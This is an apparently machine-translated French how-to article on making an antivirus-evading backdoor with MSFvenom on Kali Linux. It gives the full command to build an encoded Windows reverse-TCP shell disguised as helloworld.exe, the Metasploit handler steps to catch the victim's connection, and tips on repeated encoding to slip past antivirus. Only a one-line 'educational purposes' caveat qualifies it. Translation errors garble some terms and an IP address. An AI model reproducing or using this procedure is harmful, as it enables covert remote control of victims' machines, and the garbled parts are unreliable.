Comment créer une porte dérobée presque indétectable à l'aide de MSFvenom dans Kali Linux?

Tapez msfvenom -l encoders pour afficher la liste des encodeurs
Tapez msfvenom -l encoders pour afficher la liste des encodeurs.

Une porte dérobée est utilisée pour contourner les mécanismes de sécurité, souvent secrètement et le plus souvent de manière indétectable. En utilisant MSFvenom, la combinaison de msfpayload et msfencode, il est possible de créer une porte dérobée qui se reconnecte à l'attaquant en utilisant le protocole TCP inversé. Afin de développer une porte dérobée, vous devez modifier la signature de votre malware pour échapper à tout logiciel antivirus. Terminez ce projet sur une paire d'ordinateurs auxquels vous êtes autorisé à accéder et, ce faisant, vous en apprendrez plus sur la sécurité informatique et le fonctionnement de ce type de porte dérobée.

Pas

  1. 1
    Démarrez kali et lancez la console du terminal.
  2. 2
    Tapez ifconfig pour afficher l'interface et vérifiez votre adresse IP.
  3. 3
    Tapez msfvenom -l encoders pour afficher la liste des encodeurs.
    • Vous utiliserez x86/shikata_ga_nai comme encodeur.
  4. 4
    Tapez "msfvenom -a x86 - platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
    • -a x86 - platform windows désigne l'architecture à utiliser.
    • -p windows/shell/reverse_tcp désigne les charges utiles à intégrer.
    • LHOST désigne l'adresse IP de l'auditeur.
    • LPORT désigne le port d'écoute.
    • -b "\x00" désigne pour éviter les mauvais caractères (octets nuls).
    • -e x86/shikata_ga_nai désigne le nom des encodeurs.
    • -f exe > helloWorld.exe désigne la sortie de format.
  5. 5
    Tapez msfconsole pour activer le metasploit.
    • Vous avez maintenant généré votre porte dérobée. Lorsque la victime clique sur helloWorld.exe, la charge utile du shell intégrée est activée et se reconnecte à votre système. Pour recevoir la connexion, vous devez ouvrir le multi-handler dans Metasploit et définir les charges utiles.
  6. 6
    Tapez use exploit/multi/handler.
  7. 7
    Tapez set payload windows/shell/reverse_tcp.
  8. 8
    Tapez show options pour vérifier le module.
  9. 9
    Tapez set LHOST 192,168.48,129.
    • "LHOST" désigne l'adresse IP de l'auditeur.
  10. 10
    Tapez set LPORT 4444.
    • "LPORT" désigne le port d'écoute.
  11. 11
    Tapez run et attendez la connexion de la machine de la victime.
  12. 12
    Attendez que la victime clique sur helloworld.exe. Ensuite, vous serez connecté avec succès à la machine de la victime.
Tapez set payload windows / shell / reverse_tcp
Tapez set payload windows / shell / reverse_tcp.

Conseils

  • L'utilisation de -i <nombres> dans MSFvenom représentera les itérations de l'encodage. Parfois, plus d'itérations peuvent aider à contourner le logiciel AV.
  • Vous avez appris à générer la porte dérobée et l'encodage à l'aide de MSFvenom, mais cette méthode ne fonctionnera pas parfaitement avec certains logiciels audiovisuels de nos jours. La raison derrière cela est à cause des modèles d'exécution dans MSFvenom. Les fournisseurs audiovisuels ont ajouté la signature statique de ces modèles et les recherchent simplement. La solution à ce problème consiste à utiliser un modèle d'exécution différent ou des outils différents.

Mises en garde

  • Cet article est uniquement à des fins éducatives. Le piratage sans autorisation ou permission est contraire à l'éthique et souvent illégal.

Les choses dont vous aurez besoin

  • Kali Linux
  • les fenêtres
  • Machine virtuelle
    • VirtualBox
    • VMware

Questions et réponses

  • Que dois-je faire si une erreur apparaît lors de la création de l'exploit?
    Assurez-vous que vous avez tout fait correctement et réessayez. Assurez-vous que vous exécutez Kali Linux.

En parallèle
  1. Comment utiliser ES6?
  2. Comment embaucher un hacker éthique?
  3. Comment pirater des fenêtres avec un compte limité?
  4. Comment empêcher l'accès non autorisé aux fichiers?
  5. Comment pirater CrossFire?
  6. Comment réussir le test Idiot sur Hackthissite.org?
FacebookTwitterInstagramPinterestLinkedInGoogle+YoutubeRedditDribbbleBehanceGithubCodePenWhatsappEmail